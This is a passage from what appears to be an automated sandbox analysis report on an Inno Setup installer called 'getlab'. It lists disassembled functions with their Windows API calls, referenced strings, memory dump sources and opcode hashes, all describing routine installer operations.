                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: Inno Setup: Setup Version$r_G
                                                                          • API String ID: 3702945584-2380526977
                                                                          • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                          • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                                          • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                          • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                                          Function 00475034 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: CreateFile
                                                                          • API String ID: 2528220319-823142352
                                                                          • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                          • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                                          • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                          • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                                          Function 00456ED4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                          • API String ID: 2906209438-2320870614
                                                                          • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                          • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                                          • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                          • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                                          Function 0046CC10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2492108670-2683653824
                                                                          • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                          • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                                          • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                          • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                                          Function 00448524 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 2574300362-0
                                                                          • Opcode ID: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                          • Instruction ID: 4a5ebe3fee4a2e51bf72c529b0c862ae9b4ea9e2815ff95c09d8a3db799a058c
                                                                          • Opcode Fuzzy Hash: 38a0c8dcb6cfe2486321be47105cd2edcf630b03ef44025de89f80e5062423d0
                                                                          • Instruction Fuzzy Hash: 4A515470E00105AFDB40EFA5C481AAEBBF9EB45315F11817FE814BB391DA789E05CB99
                                                                          Function 00481240 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Append$System
                                                                          • String ID:
                                                                          • API String ID: 1489644407-0
                                                                          • Opcode ID: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                          • Instruction ID: 5c8896f7e766c0ec1e9fe117ebe49108a2e73e6ee011f2acc73c141eda266b91
                                                                          • Opcode Fuzzy Hash: 63b26f928f1c87accb3103f044f3acf90972e1faa844404f13018ca58e8bddc3
                                                                          • Instruction Fuzzy Hash: F431A0307043441AE711FB759C82BAE3B989B55318F54997BBC00A62E3CA7C9C4A87AD
                                                                          Function 004524E4 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                                          • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                                          • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: D41500D41520D41540
                                                                          • String ID:
                                                                          • API String ID: 2153611984-0
                                                                          • Opcode ID: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                          • Instruction ID: e6b34cf6ad4872bd94a826b675f3d2b909ad99421c044533a40ff62eec17d383
                                                                          • Opcode Fuzzy Hash: c4d10431c24d3ec04fd95a2756a86a033cda299e0aeed98268810ee563e95d09
                                                                          • Instruction Fuzzy Hash: C2219531A00608BFDB01DAA98D519AFB7FCEB4A341F554477FC04E3242E6B9AE04C769
                                                                          Function 0044B384 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                                          • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570ObjectSelect
                                                                          • String ID:
                                                                          • API String ID: 1230475511-0
                                                                          • Opcode ID: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                          • Instruction ID: d0000cdbf443d5d41ac7fc8b7796d2cef13fade9d4e1083fbf8e955bfb0ad8b0
                                                                          • Opcode Fuzzy Hash: c86bc8a9f0cb4198ec92499236d982b336435bb3408aeec5184fda352670fa70
                                                                          • Instruction Fuzzy Hash: 94217770A04348AFEB11DFA6C851B9FBBB8DB49304F5184BAF904A6682D778D940CB59
                                                                          Function 0044B0B8 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                                          • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                                          • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 65125430-0
                                                                          • Opcode ID: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                          • Instruction ID: 20993999b02ad9b2d132c7482a3993701c750e35562fff3cb1b1e5e45c97fd42
                                                                          • Opcode Fuzzy Hash: a3bbdd0e85052032b4464c044c199c381ab15dbe2007c11af0ea937095cc15c9
                                                                          • Instruction Fuzzy Hash: 9211B9B17046047FEB00DA6A9C82D6F77EDEB49754F10417AF504D7290D6399E0186A9
                                                                          Function 004243F4 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                                          • TranslateMessage.USER32(?), ref: 00424487
                                                                          • DispatchMessageA.USER32(?), ref: 00424491
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 4217535847-0
                                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction ID: b41559e7cef9b8617ee35765752275fac57a970be1b78d71f4432c2d4d9c435b
                                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                          • Instruction Fuzzy Hash: E911943030471096EA20F6A4E94179B73D4DFC1748F80485EF98997382D7BD9E45979F
                                                                          Function 0041663C Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                                          • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Prop$Window
                                                                          • String ID:
                                                                          • API String ID: 3363284559-0
                                                                          • Opcode ID: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                          • Instruction ID: 2f709078d098ddf512341954ec1abde5ac178872df7165362e48a9b460053d77
                                                                          • Opcode Fuzzy Hash: c28d9c26afe72c5be1bf0cacc918de6e274a174950c4a3475c45b681fa8918c3
                                                                          • Instruction Fuzzy Hash: 11F0B271701210ABDB10AB599C85FA732DCAB09715F16017AB945EF286C6B8DD5087A8
                                                                          Function 0041EE4C Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                                          • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                                          • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableEnabledVisible
                                                                          • String ID:
                                                                          • API String ID: 3234591441-0
                                                                          • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                          • Instruction ID: 168d1bb9c0e6e8839a01a9d99d3d7c452caa6e9a1b9b90f31caf5ae3eef8e520
                                                                          • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                          • Instruction Fuzzy Hash: 75E06D75100300AAE701AB2BDCC1B5B7ADCAB54350F02843FA9489B292D63ADC408B3C
                                                                          Function 00469D44 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00469E55
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: PrepareToInstall
                                                                          • API String ID: 2558294473-1101760603
                                                                          • Opcode ID: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                                          • Instruction ID: e2c6ec18e62d86bdb0c44b4d883dda39cec9e825136043f452d3b1ffdd24169b
                                                                          • Opcode Fuzzy Hash: 81b39a8fdeb0dad2a777ccf23e1b5cc1b94ea3789fac9a2a9b8faf6000b70bf0
                                                                          • Instruction Fuzzy Hash: 32A12C34A00105DFCB00EF9AD986EDEB7F5EF48304F5580B6E404AB362D778AE459B99
                                                                          Function 0046C2DC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: /:*?"<>|
                                                                          • API String ID: 0-4078764451
                                                                          • Opcode ID: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                                          • Instruction ID: b0c2865fc5a4d1d7a494ca3edaa4dc5a45f3ff44e2e280cd3bc35834766e41d0
                                                                          • Opcode Fuzzy Hash: 6835233e7ea63174332d10e4dcc06dbd64aaa3a2a45f414fb28228d8854cf9c9
                                                                          • Instruction Fuzzy Hash: 1671D770B002546AEB20EB66DCC2BEE77A19F44704F50C067F580AB391E779AD85875F
                                                                          Function 00481B8C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?), ref: 00481C3A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow
                                                                          • String ID: InitializeWizard
                                                                          • API String ID: 2558294473-2356795471
                                                                          • Opcode ID: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                                          • Instruction ID: 5241d356f86f5b5e3f0808c496da9b9c49bd8f9ac143394a12901a1e43732a0a
                                                                          • Opcode Fuzzy Hash: fdb67a5f3bc31efd8c5029728f1dc86113fdadd76a2f434d4b50cbf8c80ff7a4
                                                                          • Instruction Fuzzy Hash: 411182342452009FD700EBA9ED96B693BE8EB65318F10043BE5018B2A1DA396C01CB2D
                                                                          Function 0047BDA4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047BFEA,00000000,0047C124), ref: 0047BDE9
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BDB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-1019749484
                                                                          • Opcode ID: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                          • Instruction ID: 054ff1380bf98a065617cb750ccb895fcb12562a11c78c2a0c7ed737f373e9e0
                                                                          • Opcode Fuzzy Hash: f9eb47421012cec5c34730d2a4c0e30c6d7bbbf73eea55f5f75bb62311f339ce
                                                                          • Instruction Fuzzy Hash: F2F082317045186BDA10A65F9C42BEBA69DCB84758F20403BF508DB343DAB99E0242EC
                                                                          Function 0046ECD4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
